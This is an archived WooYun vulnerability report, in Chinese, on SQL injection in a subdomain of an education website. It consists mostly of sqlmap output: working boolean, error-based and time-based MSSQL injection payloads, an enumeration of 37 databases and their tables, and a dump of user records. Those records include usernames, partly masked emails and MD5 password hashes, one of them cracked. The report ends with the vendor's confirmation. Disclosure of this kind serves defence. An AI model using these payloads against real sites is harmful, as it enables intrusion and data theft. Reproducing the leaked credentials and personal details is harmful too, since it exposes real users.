乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-02: 细节已通知厂商并且等待厂商处理中 2016-01-06: 厂商已经确认,细节仅向厂商公开 2016-01-16: 细节向核心白帽子及相关领域专家公开 2016-01-26: 细节向普通白帽子公开 2016-02-05: 细节向实习白帽子公开 2016-02-20: 细节向公众公开
小草天才学习网某分站sql注入漏洞导致百万记录/12w会员数据泄漏
http://**.**.**.**/news_list.aspx?page=1&news_name=&sorttype=
---Place: GETParameter: kc_name Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=1&kc_name=%' AND 6327=6327 AND '%'='&area=&city=&kctype=&sorttype= Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: page=1&kc_name=%' AND 1920=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)+CHAR(98)+CHAR(109)+CHAR(113)+(SELECT (CASE WHEN (1920=1920) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(101)+CHAR(113)+CHAR(113))) AND '%'='&area=&city=&kctype=&sorttype= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: page=1&kc_name=%' AND 3931=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&area=&city=&kctype=&sorttype= ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005available databases [37]:[*] bmzx_database[*] cpu_see[*] crm[*] db_navigation[*] edutt[*] edutt2012[*] edutt3[*] hangyewangzhan[*] jinhuo_db[*] master[*] mbapx_database[*] MM315_db[*] model[*] mrmf_database[*] msdb[*] nz12345_db[*] oa_mall_database[*] oa_mall_log[*] operate_db[*] tchy[*] tchy157[*] temp[*] tempdb[*] xc0769_database[*] xc322_cart[*] xc322_db[*] xc322_info[*] xc322_log[*] xc322_order[*] xc322_review[*] xc322_user[*] xcedu_office[*] xcfz_database[*] xiaocao_database[*] xinfeng_bz_database[*] zgzkw_database[*] zhongzhuan_database---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005Database: edutt+-------------------------------+---------+| Table | Entries |+-------------------------------+---------+| dbo.tab_kc | 1021638 || dbo.view_kc_zn | 1000998 || dbo.view_kc1 | 949636 || dbo.view_kc | 919718 || dbo.view_booktext | 742803 || dbo.tab_guestbook | 515510 || dbo.view_pxjg_myweb_kc | 441649 || dbo.tab_payhb | 320530 || dbo.view_kc_vip | 298970 || dbo.view_dgkc | 243079 || dbo.view_mydownkejian | 191536 || dbo.tab_jgnews | 185028 || dbo.view_jgnews | 178428 || dbo.tab_booktext | 168332 || dbo.tab_bm | 142350 || dbo.user_info | 125110 || dbo.view_bm1 | 123505 || dbo.view_bm | 122674 || dbo.view_mydownvideo | 122050 || dbo.tab_hb | 119392 || dbo.view_mydownexam | 107476 || dbo.tab_keyword | 103079 || dbo.tab_downsource | 99929 || dbo.view_imgtext | 43376 || dbo.view_guestbook | 38144 || dbo.tab_eng | 29567 || dbo.view_eng | 29567 || dbo.tab_netdiskfile | 28857 || dbo.tab_imgtext | 26150 || dbo.tab_kc_class | 22949 || dbo.tab_ad | 22407 || dbo.view_pxjg1 | 21129 || dbo.view_pxjg | 20860 || dbo.tab_pxjg | 20856 || dbo.tab_bookdir | 20840 || dbo.view_mykfqq | 20833 || dbo.view_bookdir | 20652 || dbo.VIEW_pxjg_unlock | 19462 || dbo.view_kc_class | 15268 || dbo.view_kc3 | 14224 || dbo.tab_nx_kc | 9525 || dbo.tab_gxinfo | 5468 || dbo.tab_myqqfri | 5417 || dbo.category | 5104 || dbo.view_bm_myoa | 4860 || dbo.tab_link | 4829 || dbo.tab_kejian | 4799 || dbo.view_kejian20 | 4799 || dbo.view_myqqfri | 4141 || dbo.VIEW_booktext_formatChina | 3475 || dbo.tab_group | 2948 || dbo.tab_file | 2732 || dbo.tab_kc_myweb | 2672 || dbo.tab_pxjg_web | 2310 || dbo.tab_netdiskml | 2177 || dbo.tab_video | 2087 || dbo.view_video20 | 2087 || dbo.tab_pxjg_vip | 2036 || dbo.view_pxjg_vip | 1983 || dbo.tab_exam | 1967 || dbo.view_exam20 | 1923 || dbo.tab_pxjg_vip2 | 1886 || dbo.tab_imgdir | 1857 || dbo.view_kc_myweb | 1707 || dbo.view_dgpxjg | 1578 || dbo.tab_pxjg_myweb | 1520 || dbo.view_pxjg_myweb | 1514 || dbo.tab_keshi | 1381 || dbo.tab_ad_setup | 1295 || dbo.view_guest_myoa | 1258 || dbo.tab_mes | 1049 || dbo.view_mes1 | 1048 || dbo.view_mes | 1034 || dbo.tab_pxjg_vippay_record | 675 || dbo.tab_pxjg_vip_record | 586 || dbo.view_pxjg_vip_record | 577 || dbo.USER_FINDPWD_INFO | 526 || dbo.kc_test | 476 || dbo.tab_xqdj | 430 || dbo.tab_nx_ls | 420 || dbo.tab_nx_bm | 406 || dbo.view_dgkctj | 395 || dbo.tab_dns | 368 || dbo.tab_setup | 335 || dbo.tab_kc_tuijian | 322 || dbo.tab_spreader | 247 || dbo.view_spreader | 247 || dbo.tab_bbs_subject | 239 || dbo.view_bbs_subject | 239 || dbo.tab_pxjg_tuijian | 231 || dbo.view_dgpxjgtj | 213 || dbo.view_pxjg_zz | 191 || dbo.tab_pxjg_myoa | 154 || dbo.view_pxjg_myoa | 146 || dbo.view_video21 | 113 || dbo.view_video22 | 113 || dbo.view_pxjg_xc0769 | 90 || dbo.tab_bbs_list | 64 || dbo.view_yhhd | 62 || dbo.tab_PostLink | 53 || dbo.tab_ArticleAuthor | 49 || dbo.tab_search_tj | 46 || dbo.tab_fwgly | 34 || dbo.view_fwgly | 34 || dbo.tab_fri | 33 || dbo.view_myfri | 33 || dbo.tab_Article | 29 || dbo.tab_city_class | 24 || dbo.tab_ArticlePayRecord | 19 || dbo.tab_ArticleCategory | 10 || dbo.tab_bbs_dir | 9 || dbo.tab_fenlei | 9 || dbo.tab_bookshare | 5 || dbo.tab_vip_renew | 5 || dbo.view_bookshare | 5 || dbo.t_tian6_1 | 2 || dbo.tab_kc2 | 2 || dbo.tab_yhhd | 2 || dbo.admin_info | 1 || dbo.tab_spreadjiaose | 1 || dbo.tab_test1 | 1 || dbo.view_myspreader | 1 |+-------------------------------+---------+Database: eduttTable: user_info[8 entries]+--------+--------------+----------+-------------------------------------------+-------+-------+-------------+--------+--------+--------+-----------------+-----------------+---------+---------------------+--------------------------+----------+----------+----------+----------+----------+----------+----------+-----------+-----------+------------+------------+------------+---------------------+--------------+--------------+--------------+--------------+---------------+| id | u_id | u_postid | u_pwd | u_ask | u_sex | u_name | u_pwd3 | u_pwd2 | u_lock | u_regip | u_logip | u_date2 | u_date1 | u_email | u_jiaose | u_postqx | u_accept | u_ttflag | u_friend | u_answer | u_online | u_postpwd | u_pwdflag | u_postflag | u_logcount | u_pwdflag1 | u_loginTime | u_postttflag | u_logoutTime | u_postztarea | u_posttzarea | u_netdiskflag |+--------+--------------+----------+-------------------------------------------+-------+-------+-------------+--------+--------+--------+-----------------+-----------------+---------+---------------------+--------------------------+----------+----------+----------+----------+----------+----------+----------+-----------+-----------+------------+------------+------------+---------------------+--------------+--------------+--------------+--------------+---------------+| 100000 | 6668781 | NULL | D41D8CD98F00B204E9800998ECF8427E | NULL | 女 | afan | NULL | NULL | 0 | **.**.**.** | NULL | NULL | 2007-10-14 11:27:43 | choumf@**.**.**.** | teach | NULL | 同意 | off | NULL | NULL | 0 | 0, | 0 | 3 | 0 | 0 | NULL | 0 | NULL | 0, | 0, | off || 100001 | 666888 | NULL | D2B998DEA46A2B465635CBE96664EA69 | NULL | 女 | nqgy | NULL | NULL | 0 | **.**.**.** | **.**.**.** | NULL | 2007-4-18 9:46:01 | ningqianggs@**.**.**.** | person | NULL | 同意 | off | NULL | NULL | 1 | 0, | 0 | 3 | 1 | 0 | 2007-4-18 10:40:33 | 0 | NULL | 0, | 0, | off || 100002 | 666888666888 | NULL | E10ADC3949BA59ABBE56E057F20F883E (123456) | NULL | 男 | wutingfen | NULL | NULL | 0 | **.**.**.** | **.**.**.** | NULL | 2007-10-10 12:04:47 | wutingfen@**.**.**.** | teach | NULL | 同意 | off | NULL | <blank> | 1 | 0, | 0 | 3 | 1 | 0 | 2007-10-10 12:05:45 | 0 | NULL | 0, | 0, | off || 100003 | 6668888 | NULL | FE2133F5C9F0BC2813402DB7952CA299 | NULL | 男 | 夏日行风 | NULL | NULL | 0 | **.**.**.** | NULL | NULL | 2008-1-1 21:04:49 | love.qwlove@**.**.**.**.cn | person | NULL | 同意 | off | NULL | NULL | 0 | 0, | 0 | 3 | 0 | 0 | NULL | <blank> | NULL | 0, | 0, | off || 100004 | 666888888 | NULL | F2888B985E70603BA2AF6A57D4CC77A7 | NULL | 女 | haohaoxuexi | NULL | NULL | 0 | **.**.**.** | NULL | NULL | 2007-6-17 20:39:35 | chengxiu365@**.**.**.** | pxjg | NULL | 同意 | off | NULL | NULL | 0 | 0, | 0 | 3 | 0 | 0 | NULL | 0 | NULL | 0, | 0, | off || 100005 | 666888999 | NULL | DAC0C115E769208FE60AACA5112A69F2 | NULL | 男 | haoaoa | NULL | NULL | 0 | **.**.**.** | NULL | NULL | 2007-12-20 12:51:56 | yuwanping0000@**.**.**.** | person | <blank> | 同意 | on | NULL | NULL | 0 | 0, | 0 | 3 | 0 | 0 | NULL | 0 | NULL | 0, | 0, | off || 100006 | 66689525 | NULL | 124E960B62B074CB3FB620E125FD96DC | NULL | 男 | 天海 | NULL | NULL | 0 | **.**.**.** | NULL | NULL | 2007-7-16 14:54:29 | skysea2fl@**.**.**.** | teach | NULL | 同意 | off | NULL | NULL | 0 | 0, | 0 | 3 | 0 | 0 | NULL | 0 | NULL | 0, | 0, | off || 100007 | 6669028 | NULL | D41D8CD98F00B204E9800998ECF8427E | NULL | 男 | sj999 | NULL | NULL | 0 | **.**.**.** | **.**.**.** | NULL | 2008-2-22 23:43:56 | wjq_sj@**.**.**.** | teach | NULL | 同意 | off | NULL | NULL | 1 | 0, | 0 | 3 | 1 | 0 | 2008-2-27 15:31:04 | 0 | NULL | 0, | 0, | off |+--------+--------------+----------+-------------------------------------------+-------+-------+-------------+--------+--------+--------+-----------------+-----------------+---------+---------------------+--------------------------+----------+----------+----------+----------+----------+----------+----------+-----------+-----------+------------+------------+------------+---------------------+--------------+--------------+--------------+--------------+---------------+
参数过滤
危害等级:高
漏洞Rank:10
确认时间:2016-01-06 17:34
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无
